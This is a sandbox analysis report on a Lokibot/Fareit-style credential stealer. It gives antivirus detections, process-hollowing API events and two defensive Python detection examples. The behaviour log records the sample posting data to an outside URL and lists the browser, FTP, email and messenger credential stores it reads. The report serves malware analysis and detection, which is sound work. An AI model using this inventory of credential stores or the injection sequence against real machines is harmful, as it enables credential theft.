11.4
0-day

SHA256: 4529a16a204933c5135c633c039d546c171c014813b65c68923133f65f895fce

File name: dd19b37a2b9a1e2ed964e131caa8a6e7.exe

Analysis duration: 94s

Last analyzed:

File size: 586.5KB
Static scan: flagged    Dynamic scan: flagged    Threat score: 100%
HawkEye engine (鹰眼引擎)
Not detected: the HawkEye engine has no result for this sample
Static verdict
Antivirus engines
Engine      | Result                            | Scan date  | Engine version
McAfee      | Fareit-FSK!DD19B37A2B9A           | 2020-12-11 | 6.0.6.653
Alibaba     | Backdoor:Win32/Lokibot.758ff0df   | 2019-05-27 | 0.3.0.5
Baidu       | (no detection)                    | 2019-03-18 | 1.0.0.2
Avast       | Win32:Malware-gen                 | 2020-12-10 | 21.1.5827.0
Tencent     | Win32.Backdoor.Androm.Wrqf        | 2020-12-11 | 1.0.0.1
Kingsoft    | (no detection)                    | 2020-12-11 | 2017.9.26.565
CrowdStrike | win/malicious_confidence_100% (W) | 2019-07-02 | 1.0
Static indicators
Queries for the computer name (3 events)
Time & API Arguments Status Return Repeated
1619980806.172375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619980807.484375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619980808.219375
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 event)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks the amount of memory in the system; this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated
1619980804.375375
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive; CODE, DATA and BSS are the standard section names of Delphi-built binaries, so on their own they only confirm the compiler) (3 events)
section CODE
section DATA
section BSS
The executable uses a known packer (1 event)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (3 events)
Time & API Arguments Status Return Repeated
1619948418.313205
__exception__
stacktrace:
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 34144064
registers.edi: 0
registers.eax: 0
registers.ebp: 34144136
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 1969237513
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 50 e9 66 37 fa
exception.symbol: dd19b37a2b9a1e2ed964e131caa8a6e7+0x5fe25
exception.instruction: div eax
exception.module: dd19b37a2b9a1e2ed964e131caa8a6e7.exe
exception.exception_code: 0xc0000094 (STATUS_INTEGER_DIVIDE_BY_ZERO: eax is 0 when the `div eax` at 0x45fe25 executes; this event carries the same timestamp range as the injection events below, i.e. it happened in the original process 784)
exception.offset: 392741
exception.address: 0x45fe25
success 0 0
1619980809.531375
__exception__
stacktrace:
dd19b37a2b9a1e2ed964e131caa8a6e7+0x12fdd @ 0x412fdd
dd19b37a2b9a1e2ed964e131caa8a6e7+0x1296e @ 0x41296e
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 40828724
registers.edi: 35124298
registers.eax: 41091104
registers.ebp: 40828732
registers.edx: 6172672
registers.ebx: 41091104
registers.esi: 858591252
registers.ecx: 0
exception.instruction_r: 8a 0a 88 0c 17 42 4e 75 f7 5f 5e 5d c3 55 8b ec
exception.symbol: dd19b37a2b9a1e2ed964e131caa8a6e7+0x2b41
exception.instruction: mov cl, byte ptr [edx]
exception.module: dd19b37a2b9a1e2ed964e131caa8a6e7.exe
exception.exception_code: 0xc0000005 (STATUS_ACCESS_VIOLATION: the faulting bytes 8a 0a 88 0c 17 42 4e 75 f7 decode to a byte-copy loop, mov cl,[edx]; mov [edi+edx],cl; inc edx; dec esi; jnz, and the read through the source pointer edx = 0x005e3000 faulted)
exception.offset: 11073
exception.address: 0x402b41
success 0 0
1619980874.625375
__exception__
stacktrace:
dd19b37a2b9a1e2ed964e131caa8a6e7+0x12fdd @ 0x412fdd
dd19b37a2b9a1e2ed964e131caa8a6e7+0x1296e @ 0x41296e
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 904134452
registers.edi: 898060714
registers.eax: 904134688
registers.ebp: 904134460
registers.edx: 6172672
registers.ebx: 904134688
registers.esi: 858698420
registers.ecx: 0
exception.instruction_r: 8a 0a 88 0c 17 42 4e 75 f7 5f 5e 5d c3 55 8b ec
exception.symbol: dd19b37a2b9a1e2ed964e131caa8a6e7+0x2b41
exception.instruction: mov cl, byte ptr [edx]
exception.module: dd19b37a2b9a1e2ed964e131caa8a6e7.exe
exception.exception_code: 0xc0000005 (STATUS_ACCESS_VIOLATION again at the same copy loop, with the same source pointer edx = 0x005e3000 as the previous event)
exception.offset: 11073
exception.address: 0x402b41
success 0 0
Behavioral verdict
Dynamic indicators
One or more potentially interesting buffers were extracted; these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)
suspicious_features: POST method with no Referer header; HTTP version 1.0 used
suspicious_request: POST http://detrulp.com/m3-q/pin.php
Performs some HTTP requests (1 event)
request POST http://detrulp.com/m3-q/pin.php
Sends data using the HTTP POST method (1 event)
request POST http://detrulp.com/m3-q/pin.php
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619948418.235205
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619948418.313205
NtAllocateVirtualMemory
process_identifier: 784
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005c0000
success 0 0
1619948418.313205
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02e10000
success 0 0
Steals private information from local Internet browsers (19 events; the paths are those the sample tried to open, including its own malformed "AppData\LocalMapleStudio" variants, reproduced as recorded)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Moves the original executable to a new location (1 event)
Time & API Arguments Status Return Repeated
1619980808.094375
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dd19b37a2b9a1e2ed964e131caa8a6e7.exe
newfilepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
newfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\6ED2B0\0019EA.exe
flags: 1
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dd19b37a2b9a1e2ed964e131caa8a6e7.exe
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (3 events)
entropy 7.714394897164579  section DATA  (virtual_address 0x00061000, virtual_size 0x0000a838, size_of_data 0x0000aa00): a section with high entropy has been found
entropy 7.497013722264664  section .rsrc (virtual_address 0x0007a000, virtual_size 0x0001f05c, size_of_data 0x0001f200): a section with high entropy has been found
entropy 0.2852263023057216  description: overall entropy of this PE file is high. Note that this third figure is not a Shannon entropy: the signature reports the fraction of the PE's section data that sits in sections flagged above (0xaa00 + 0x1f200 = 171008 bytes out of roughly 586.5KB gives 0.285), and it fires once that fraction exceeds its threshold.
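To make the two kinds of figure in that signature concrete, here is an added example (not the sandbox's code) that computes per-section Shannon entropy and the share of section data that high-entropy sections occupy. The section names and the DATA/.rsrc sizes are taken from the report; the section bytes are constructed (pseudo-random for DATA/.rsrc, repetitive text for CODE), and the 6.8-bit and 0.2 thresholds are this example's assumptions about the signature's cut-offs.

```python
import math
import random


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly distributed bytes. This is the per-section figure the report prints."""
    n = len(data)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def section_entropies(sections):
    """sections: list of (name, raw_bytes). Returns records shaped like the
    report's section entries: name, size_of_data, entropy."""
    return [{"name": name, "size_of_data": len(raw), "entropy": shannon_entropy(raw)}
            for name, raw in sections]


def packer_entropy_verdict(records, section_threshold=6.8, overall_threshold=0.2):
    """Two-part check: flag each section above the per-section threshold, then
    report what fraction of all section data those sections account for.
    Both thresholds are assumptions about the sandbox signature, not its code."""
    flagged = [r for r in records if r["entropy"] > section_threshold]
    total = sum(r["size_of_data"] for r in records)
    ratio = sum(r["size_of_data"] for r in flagged) / total if total else 0.0
    return {
        "flagged_sections": [r["name"] for r in flagged],
        "high_entropy_ratio": ratio,
        "overall_high": ratio > overall_threshold,
    }


def _pseudo_random_bytes(rng, n):
    """Deterministic filler standing in for packed/encrypted data."""
    return rng.getrandbits(8 * n).to_bytes(n, "little")


def constructed_sample():
    """Constructed stand-in for the sample's layout (not the real section bytes):
    a low-entropy CODE section plus two pseudo-random sections with the
    DATA and .rsrc sizes from the report."""
    rng = random.Random(0xDD19B37A)
    return section_entropies([
        ("CODE",  b"mov eax, ebx; " * (0x60000 // 14)),          # repetitive text, low entropy
        ("DATA",  _pseudo_random_bytes(rng, 0x0000AA00)),        # 43520 bytes, as in the report
        (".rsrc", _pseudo_random_bytes(rng, 0x0001F200)),        # 127488 bytes, as in the report
    ])


if __name__ == "__main__":
    recs = constructed_sample()
    for r in recs:
        print(f"{r['name']:6} size={r['size_of_data']:7d} entropy={r['entropy']:.3f}")
    print(packer_entropy_verdict(recs))
```

Byte entropy ignores repetition, so the CODE section stays well under the threshold however large it is; on the constructed layout the two pseudo-random sections make up about 30% of the section data, which is the kind of ratio that produces the "overall entropy is high" line above.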
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)
Time & API Arguments Status Return Repeated
1619980807.375375
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
Network communication
Communicates with a host for which no DNS query was performed (1 event)
host 172.217.24.14
Harvests credentials from local FTP client software (22 events)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 events)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process, indicative of process injection (2 events)
Process injection Process 784 called NtSetContextThread to modify thread in remote process 2732
Time & API Arguments Status Return Repeated
1619948418.844205
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2732
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process, potentially indicative of process injection (2 events)
Process injection Process 784 resumed a thread in remote process 2732
Time & API Arguments Status Return Repeated
1619948419.110205
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2732
success 0 0
Executed a process and injected code into it, probably while unpacking (7 events)
Time & API Arguments Status Return Repeated
1619948418.672205
CreateProcessInternalW
thread_identifier: 2340
thread_handle: 0x00000100
process_identifier: 2732
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\dd19b37a2b9a1e2ed964e131caa8a6e7.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000104
inherit_handles: 0
success 1 0
1619948418.672205
NtUnmapViewOfSection
process_identifier: 2732
region_size: 4096
process_handle: 0x00000104
base_address: 0x00400000
success 0 0
1619948418.672205
NtMapViewOfSection
section_handle: 0x0000010c
process_identifier: 2732
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000104
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619948418.844205
NtGetContextThread
thread_handle: 0x00000100
success 0 0
1619948418.844205
NtSetContextThread
thread_handle: 0x00000100
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2732
success 0 0
1619948419.110205
NtResumeThread
thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2732
success 0 0
1619980805.047375
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 2732
success 0 0
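The seven events above are the classic process-hollowing sequence: a copy of the sample is started suspended, its image at 0x00400000 is unmapped, a section of 663552 bytes is mapped in its place with PAGE_EXECUTE_READWRITE, the suspended thread's context is rewritten, and the thread is resumed. On an x86 thread that was created suspended, the EAX slot of that context holds the entry point the loader will jump to and EBX the PEB address, so the NtSetContextThread event tells you where the mapped image starts executing (eax = 4274654 = 0x4139de, inside the new mapping) without any memory dump. The following detector is an added example, not the sandbox's or the sample's code: it replays a trace constructed from the events on this page (PIDs, flags, sizes and timestamps copied from the report; the field names and the stage predicates are this example's own) and only reports a child once the whole ordered chain has been seen for that PID.

```python
"""Ordered-chain detector for the hollowing sequence recorded in this report.

Added example. TRACE is constructed from the report's events; the ApiCall
shape, STAGES and the predicates are this example's assumptions, not the
sandbox's data model.
"""
from dataclasses import dataclass, field


@dataclass
class ApiCall:
    ts: float
    api: str
    args: dict = field(default_factory=dict)


CREATE_SUSPENDED = 0x4          # creation_flags bit
PAGE_EXECUTE_READWRITE = 0x40   # win32_protect value

# Constructed from the "Executed a process and injected code into it" events above.
TRACE = [
    ApiCall(1619948418.672205, "CreateProcessInternalW",
            {"process_identifier": 2732, "thread_handle": 0x100, "creation_flags": 4,
             "command_line": r'"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp'
                             r'\dd19b37a2b9a1e2ed964e131caa8a6e7.exe"'}),
    ApiCall(1619948418.672205, "NtUnmapViewOfSection",
            {"process_identifier": 2732, "base_address": 0x400000, "region_size": 4096}),
    ApiCall(1619948418.672205, "NtMapViewOfSection",
            {"process_identifier": 2732, "base_address": 0x400000,
             "win32_protect": 0x40, "view_size": 663552}),
    ApiCall(1619948418.844205, "NtGetContextThread", {"thread_handle": 0x100}),
    ApiCall(1619948418.844205, "NtSetContextThread",
            {"process_identifier": 2732, "thread_handle": 0x100,
             "registers.eip": 0, "registers.eax": 4274654, "registers.ebx": 2130567168}),
    ApiCall(1619948419.110205, "NtResumeThread",
            {"process_identifier": 2732, "thread_handle": 0x100, "suspend_count": 1}),
]

# The chain in the order it must occur against one target PID.
STAGES = [
    ("CreateProcessInternalW", lambda a: bool(a.get("creation_flags", 0) & CREATE_SUSPENDED)),
    ("NtUnmapViewOfSection",   lambda a: True),
    ("NtMapViewOfSection",     lambda a: a.get("win32_protect") == PAGE_EXECUTE_READWRITE),
    ("NtSetContextThread",     lambda a: True),
    ("NtResumeThread",         lambda a: a.get("suspend_count", 0) >= 1),
]


def find_hollowing(trace):
    """Return {pid: [stage apis]} for every target PID that completed the chain.

    Stages must be matched in order per PID; partial matches (for example a
    suspended child that is merely resumed) are not reported, which keeps
    ordinary debuggers and installers out of the result.
    """
    progress = {}   # pid -> index of the next stage expected
    matched = {}    # pid -> apis matched so far
    for call in sorted(trace, key=lambda c: c.ts):   # stable: equal timestamps keep order
        pid = call.args.get("process_identifier")
        if pid is None or progress.get(pid, 0) >= len(STAGES):
            continue
        api, pred = STAGES[progress.get(pid, 0)]
        if call.api == api and pred(call.args):
            progress[pid] = progress.get(pid, 0) + 1
            matched.setdefault(pid, []).append(api)
    return {pid: apis for pid, apis in matched.items() if progress[pid] == len(STAGES)}


def injected_entry_point(trace, pid):
    """EAX written by NtSetContextThread for `pid`: the entry point the loader
    will jump to when the suspended initial thread is resumed (x86)."""
    for call in trace:
        if call.api == "NtSetContextThread" and call.args.get("process_identifier") == pid:
            return call.args.get("registers.eax")
    return None


if __name__ == "__main__":
    for pid, apis in find_hollowing(TRACE).items():
        print(f"pid {pid}: {' -> '.join(apis)}; entry point eax=0x{injected_entry_point(TRACE, pid):x}")
```

The NtGetContextThread event carries no target PID in the report and is skipped; the second NtResumeThread (thread handle 0x110, from the later timestamp range) arrives after the chain is already complete and is ignored for the same reason. Note that the injected image lands at 0x00400000 with size 0xa2000, so the entry point 0x4139de is the place to set a breakpoint if you reproduce the run under a debugger.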
File has been identified by 56 antivirus engines on VirusTotal as malicious (50 of 56 events shown)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Zusy.302775
FireEye Generic.mg.dd19b37a2b9a1e2e
McAfee Fareit-FSK!DD19B37A2B9A
Cylance Unsafe
Zillya Trojan.Injector.Win32.728056
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:Win32/Lokibot.758ff0df
K7GW Riskware ( 0040eff71 )
Cybereason malicious.a61627
Arcabit Trojan.Zusy.D49EB7
Symantec Trojan.Gen.2
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Backdoor.Win32.Androm.gen
BitDefender Gen:Variant.Zusy.302775
NANO-Antivirus Trojan.Win32.Stealer.hjzdcc
Avast Win32:Malware-gen
Tencent Win32.Backdoor.Androm.Wrqf
Ad-Aware Gen:Variant.Zusy.302775
Sophos Mal/Generic-R + Mal/Fareit-AA
Comodo Malware@#1kpz717b0w1c1
DrWeb Trojan.PWS.Stealer.27790
VIPRE Trojan.Win32.Simda.ba (v)
TrendMicro TROJ_GEN.R066C0DIK20
McAfee-GW-Edition BehavesLike.Win32.Fareit.hc
Emsisoft Gen:Variant.Zusy.302775 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Backdoor.Androm.awbm
eGambit Unsafe.AI_Score_99%
Avira HEUR/AGEN.1133569
Antiy-AVL Trojan/Win32.Lokibot
Gridinsoft Trojan.Win32.Injector.cc
Microsoft Trojan:Win32/Lokibot.VD!MTB
ZoneAlarm HEUR:Backdoor.Win32.Androm.gen
GData Gen:Variant.Zusy.302775
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
BitDefenderTheta Gen:NN.ZelphiF.34670.KGW@a8s2X7ni
ALYac Gen:Variant.Zusy.302775
MAX malware (ai score=80)
VBA32 BScope.Trojan.Crypt
Malwarebytes Spyware.AgentTesla
ESET-NOD32 a variant of Win32/Injector.ELTZ
TrendMicro-HouseCall TROJ_GEN.R066C0DIK20
Rising Trojan.Injector!1.CB27 (CLASSIC)
Ikarus Trojan.Win32.Krypt
MaxSecure Trojan.Malware.300983.susgen
Visual analysis
Binary image
No binary image: no binary visualization was generated for this sample
Runtime screenshots
No screenshots: none were captured while the sample ran


PE Compile Time

1992-06-20 06:22:17 (this is the constant TimeDateStamp 0x2A425E19 that Delphi's linker writes into every binary, 1992-06-19 22:22:17 UTC, shown here in UTC+8; it is not the real build date, and it agrees with the BobSoft Mini Delphi packer match and the CODE/DATA/BSS section names above)

Imports

Library kernel32.dll:
0x46d150 VirtualFree
0x46d154 VirtualAlloc
0x46d158 LocalFree
0x46d15c LocalAlloc
0x46d160 GetVersion
0x46d164 GetCurrentThreadId
0x46d170 VirtualQuery
0x46d174 WideCharToMultiByte
0x46d178 MultiByteToWideChar
0x46d17c lstrlenA
0x46d180 lstrcpynA
0x46d184 LoadLibraryExA
0x46d188 GetThreadLocale
0x46d18c GetStartupInfoA
0x46d190 GetProcAddress
0x46d194 GetModuleHandleA
0x46d198 GetModuleFileNameA
0x46d19c GetLocaleInfoA
0x46d1a0 GetCommandLineA
0x46d1a4 FreeLibrary
0x46d1a8 FindFirstFileA
0x46d1ac FindClose
0x46d1b0 ExitProcess
0x46d1b4 WriteFile
0x46d1bc RtlUnwind
0x46d1c0 RaiseException
0x46d1c4 GetStdHandle
Library user32.dll:
0x46d1cc GetKeyboardType
0x46d1d0 LoadStringA
0x46d1d4 MessageBoxA
0x46d1d8 CharNextA
Library advapi32.dll:
0x46d1e0 RegQueryValueExA
0x46d1e4 RegOpenKeyExA
0x46d1e8 RegCloseKey
Library oleaut32.dll:
0x46d1f0 SysFreeString
0x46d1f4 SysReAllocStringLen
0x46d1f8 SysAllocStringLen
Library kernel32.dll:
0x46d200 TlsSetValue
0x46d204 TlsGetValue
0x46d208 LocalAlloc
0x46d20c GetModuleHandleA
Library advapi32.dll:
0x46d214 RegQueryValueExA
0x46d218 RegOpenKeyExA
0x46d21c RegCloseKey
Library kernel32.dll:
0x46d224 lstrcpyA
0x46d228 lstrcmpA
0x46d22c WriteFile
0x46d234 WaitForSingleObject
0x46d238 VirtualQuery
0x46d23c VirtualAlloc
0x46d240 Sleep
0x46d244 SizeofResource
0x46d248 SetThreadLocale
0x46d24c SetFilePointer
0x46d250 SetEvent
0x46d254 SetErrorMode
0x46d258 SetEndOfFile
0x46d25c ResetEvent
0x46d260 ReadFile
0x46d264 MulDiv
0x46d268 LockResource
0x46d26c LoadResource
0x46d270 LoadLibraryA
0x46d27c GlobalUnlock
0x46d280 GlobalReAlloc
0x46d284 GlobalHandle
0x46d288 GlobalLock
0x46d28c GlobalFree
0x46d290 GlobalFindAtomA
0x46d294 GlobalDeleteAtom
0x46d298 GlobalAlloc
0x46d29c GlobalAddAtomA
0x46d2a0 GetVersionExA
0x46d2a4 GetVersion
0x46d2a8 GetTickCount
0x46d2ac GetThreadLocale
0x46d2b4 GetSystemTime
0x46d2b8 GetSystemInfo
0x46d2bc GetStringTypeExA
0x46d2c0 GetStdHandle
0x46d2c4 GetProcAddress
0x46d2c8 GetModuleHandleA
0x46d2cc GetModuleFileNameA
0x46d2d0 GetLocaleInfoA
0x46d2d4 GetLocalTime
0x46d2d8 GetLastError
0x46d2dc GetFullPathNameA
0x46d2e0 GetFileAttributesA
0x46d2e4 GetDiskFreeSpaceA
0x46d2e8 GetDateFormatA
0x46d2ec GetCurrentThreadId
0x46d2f0 GetCurrentProcessId
0x46d2f4 GetCPInfo
0x46d2f8 GetACP
0x46d2fc FreeResource
0x46d300 InterlockedExchange
0x46d304 FreeLibrary
0x46d308 FormatMessageA
0x46d30c FindResourceA
0x46d310 FindFirstFileA
0x46d314 FindClose
0x46d324 ExitThread
0x46d328 ExitProcess
0x46d32c EnumCalendarInfoA
0x46d338 CreateThread
0x46d33c CreateFileA
0x46d340 CreateEventA
0x46d344 CompareStringA
0x46d348 CloseHandle
Library version.dll:
0x46d350 VerQueryValueA
0x46d358 GetFileVersionInfoA
Library gdi32.dll:
0x46d360 UnrealizeObject
0x46d364 StretchBlt
0x46d368 SetWindowOrgEx
0x46d36c SetWinMetaFileBits
0x46d370 SetViewportOrgEx
0x46d374 SetTextColor
0x46d378 SetStretchBltMode
0x46d37c SetROP2
0x46d380 SetPixel
0x46d384 SetEnhMetaFileBits
0x46d388 SetDIBColorTable
0x46d38c SetBrushOrgEx
0x46d390 SetBkMode
0x46d394 SetBkColor
0x46d398 SelectPalette
0x46d39c SelectObject
0x46d3a0 SaveDC
0x46d3a4 RestoreDC
0x46d3a8 Rectangle
0x46d3ac RectVisible
0x46d3b0 RealizePalette
0x46d3b4 Polyline
0x46d3b8 PlayEnhMetaFile
0x46d3bc PatBlt
0x46d3c0 MoveToEx
0x46d3c4 MaskBlt
0x46d3c8 LineTo
0x46d3cc IntersectClipRect
0x46d3d0 GetWindowOrgEx
0x46d3d4 GetWinMetaFileBits
0x46d3d8 GetTextMetricsA
0x46d3e4 GetStockObject
0x46d3e8 GetPixel
0x46d3ec GetPaletteEntries
0x46d3f0 GetObjectA
0x46d3fc GetEnhMetaFileBits
0x46d400 GetDeviceCaps
0x46d404 GetDIBits
0x46d408 GetDIBColorTable
0x46d40c GetDCOrgEx
0x46d414 GetClipBox
0x46d418 GetBrushOrgEx
0x46d41c GetBitmapBits
0x46d420 ExcludeClipRect
0x46d424 DeleteObject
0x46d428 DeleteEnhMetaFile
0x46d42c DeleteDC
0x46d430 CreateSolidBrush
0x46d434 CreatePenIndirect
0x46d438 CreatePalette
0x46d440 CreateFontIndirectA
0x46d444 CreateDIBitmap
0x46d448 CreateDIBSection
0x46d44c CreateCompatibleDC
0x46d454 CreateBrushIndirect
0x46d458 CreateBitmap
0x46d45c CopyEnhMetaFileA
0x46d460 BitBlt
Library user32.dll:
0x46d468 CreateWindowExA
0x46d46c WindowFromPoint
0x46d470 WinHelpA
0x46d474 WaitMessage
0x46d478 UpdateWindow
0x46d47c UnregisterClassA
0x46d480 UnhookWindowsHookEx
0x46d484 TranslateMessage
0x46d48c TrackPopupMenu
0x46d494 ShowWindow
0x46d498 ShowScrollBar
0x46d49c ShowOwnedPopups
0x46d4a0 ShowCursor
0x46d4a4 SetWindowsHookExA
0x46d4a8 SetWindowTextA
0x46d4ac SetWindowPos
0x46d4b0 SetWindowPlacement
0x46d4b4 SetWindowLongA
0x46d4b8 SetTimer
0x46d4bc SetScrollRange
0x46d4c0 SetScrollPos
0x46d4c4 SetScrollInfo
0x46d4c8 SetRect
0x46d4cc SetPropA
0x46d4d0 SetParent
0x46d4d4 SetMenuItemInfoA
